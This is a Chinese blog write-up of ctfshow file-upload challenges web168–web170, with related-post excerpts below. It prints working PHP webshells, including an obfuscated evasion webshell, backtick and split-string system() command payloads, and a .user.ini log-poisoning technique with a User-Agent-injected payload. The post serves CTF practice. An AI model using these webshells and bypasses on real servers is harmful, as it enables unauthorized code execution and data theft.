ctfshow--web入门--文件上传--web168--web170

最新推荐文章于 2024-07-11 16:21:08 发布
最新推荐文章于 2024-07-11 16:21:08 发布
阅读量712 收藏 2
点赞数 15
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/137591416
版权

web168

法一免杀脚本

还是检查,准备上传图片马
在这里插入图片描述我写的是<?php eval($_POST[a]);?>
上传之后没反应
在这里插入图片描述
那么查一下,原来是发现对eval,system还有$_POST$_GET进行过滤,$_REQUEST还可以用
那么再写一个马(免杀脚本)

<?php $bFIY=create_function(chr(25380/705).chr(92115/801).base64_decode('bw==').base64_decode('bQ==').base64_decode('ZQ=='),chr(0x16964/0x394).chr(0x6f16/0xf1).base64_decode('YQ==').base64_decode('bA==').chr(060340/01154).chr(01041-0775).base64_decode('cw==').str_rot13('b').chr(01504-01327).base64_decode('ZQ==').chr(057176/01116).chr(0xe3b4/0x3dc));$bFIY(base64_decode('NjgxO'.'Tc7QG'.'V2QWw'.'oJF9Q'.''.str_rot13('G').str_rot13('1').str_rot13('A').base64_decode('VQ==').str_rot13('J').''.''.chr(0x304-0x2d3).base64_decode('Ug==').chr(13197/249).str_rot13('F').base64_decode('MQ==').''.'B1bnR'.'VXSk7'.'MjA0N'.'TkxOw'.'=='.''));?>
TyKPuntU是链接密码

在这里插入图片描述下载文件之后什么都没有,那么估计就是没有php解析,那我们就改文件后缀也改成php
在这里插入图片描述访问/upload/m.php
在这里插入图片描述查看两个文件发现flag在flagaa.php里面
在这里插入图片描述

法二

用反引号直接执行命令

<?=`ls ../`;
<?=`tac ../flagaa.php`;

法三

分开构造函数绕过

<?php $a="sys"."tem";$a("ls ../");
<?php $a="sys"."tem";$a("tac ../flagaa.php");

web169

还是检查要zip文件
在这里插入图片描述上传zip文件发现不行,那么我们就要想想为啥(想不出来)
查了原来是

前端要求zip。后端要求png,但是还是可以修改后缀。 过滤了<

所以上一道的那些做法就不行了,这里使用日志文件包含

.user.ini
auto_prepend_file=/var/log/nginx/access.log

**Content-Type要改为image/png**这个很重要
在这里插入图片描述日志包含的时候我们是上传.user.ini文件,且要.user.ini生效的前提是访问本文件夹内的php文件,它才能起到配置作用,所以先上传了一个(随便啥都行)没有内容的m.php文件上去,再上传.user.ini文件包含日志
然后随便上传一个php文件
(上传zip文件再改包)
在这里插入图片描述再上传这个

.user.ini
auto_prepend_file=/var/log/nginx/access.log

在这里插入图片描述然后访问/upload/m.php
在user-agent写上一句话
在这里插入图片描述查看文件
在这里插入图片描述查看flag在这里插入图片描述

web170

与上题同

baozongwi
关注
  • 15
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow 文件上传 web168
Kradress的博客
02-17 380
目录思路总结 思路 先查看源代码,发现限制上传png 直接上传png的图片马,回显null,发现对eval,system还有$_POST和$_GET进行过滤,$_REQUEST还可以用 替换图片马中的一句话,把文件后缀改成php,成功上传 <?php $_REQUEST[0]($_REQUEST[1]);?> 访问/upload/shell.php,直接rce拿到flag 总结 … ...
ctfshow web入门(文件上传)
qq_53263789的博客
07-19 2297
ctfshow 文件上传
ctfshow-web入门-文件上传web166、web167)&(web168-web170)免杀绕过
最新发布
Welcome To Myon'Blog !
07-11 991
查看源码,前端只让传 zip上传 zip 成功后可以进行下载随便搞一个压缩包,使用记事本编辑,在其内容里插入一句话木马:上传该压缩包,上传成功后点击下载文件,使用 burpsuite 抓包:我这里木马内容用的 request ,就在 get 里执行 ls 没什么问题,但是读取 flag 时识别有点问题,最好使用 post 请求,因此将请求方法改为 post ,将 file 的内容还原到上面。
CTFshow——文件上传
D.MIND 的博客
02-23 1305
目录:web151、152——前后端的简单检验web153——.user.ini配置文件web154、155——PHP的其他标记写法web156——{ }代替[ ]web157、158、159——web160—— web151、152——前后端的简单检验 发现只能上传PNG文件,上传一个图片马,用Burp抓包修改文件后缀  1.在upload/xx.php页面结合一句话木马  2.用蚁剑、菜刀连接 web153——.user.ini配置文件 细看:.htaccess和.user.ini配置文件妙用 如
2024年最全CTFshow web入门——文件上传_ctfshow文件上传,给大家安排上
2401_84520377的博客
05-05 1033
上传一个图片木马,发现上传不了,经过一系列的尝试发现是对文件内容作了些过滤,过滤了php,所以采用简短的语句进行绕过。经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。剩下的步骤与151相同查看上级目录,发现flag.php,查看flag.php内容得到flag。那就直接输出flag算了,不搞一句话了。要修改的图片的路径,1.png是使用的文件,可以不存在。查看flag.php文件内容得出flag。下面的代码可以检测是否有gd库的存在。将生成的图片上传,bp抓包。
CTFshow-web入门-文件上传
weixin_44770698的博客
07-06 1100
CTFshow-文件上传
ctfshow---文件上传
fainpo的博客
04-10 606
来到文件上传了。
ctfshow -web文件上传
m0_72898152的博客
02-02 887
ctf
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFShow-周末大挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
CTFshow web入门 web150-web170 文件上传
qq_56815564的博客
07-04 757
俗话说的好,逆向手的尽头是全栈,于是我又回来学web了,前面可能还看得懂一点,后面因为一心只想着做题目去了就没讲太细了,不过如果前面理解的话后面肯定也是知道的,所以加油吧。
ctfshow——文件上传
qq_55202378的博客
12-27 1299
之外,php还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’]所指定)。的组件库,url代表上传接口,accept代表允许上传的文件类型,exts代表允许上传的文件后缀。风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。,上传一个png的webshell,再使用burp抓包更改文件后缀名,再访问上传的webshell。
ctfshow文件上传系列
m0_73500273的博客
07-08 218
用bp抓包,改后缀名为php发送之后会显示上传成功,后面会有他的上传路径。用哥斯拉进行连接,然后翻目录就能父目录找到flag。先把文件名后缀改为png,,然后是上传。这个要洗一个一句话木马。
ctfshow-文件包含&文件上传(详解)
qq_50589021的博客
07-20 4011
文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain;base64,PD9waHAgc3lzd
ctfshow web入门文件上传
Npceer-一位网安初学者的博客
05-25 400
之前已经写了一部分了 补一下博客 给自己之后当笔记看看 这里写目录标题0x01 web153(前面两题懒得写博客了)0x02 web 154 0x01 web153(前面两题懒得写博客了) 首先题目环境大多是nginx 前面两题是前端验证 直接抓包改后缀就行 这次不行了 所以说到nginx我们考虑到.uer.ini (.htaccess是apache下的) 但是被挡下来了 于是上传.user.ini.png 内容是 然后抓包把后缀.png去掉 就可以 这个第一行是gif的文件头 之前写其他平台文件上传的时
CTFShow web151-170 (文件上传)
lonmar的博客
12-02 5527
web151 前端检测类型,burp抓包修改文件名称即可 文件上传思路,先上传一张图片马,再慢慢测试过滤规则(文件名,之类的) web152 思路和前面的一致 web153 上传.user.ini配置文件 原理:https://www.dazhuanlan.com/2020/03/08/5e641cbc397c2/ 防挂 https://www.cnblogs.com/l0nmar/p/14053889.html 发现很容易上传如php5,phtml等类型文件,但是不解析.通过插件识别为ngin
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值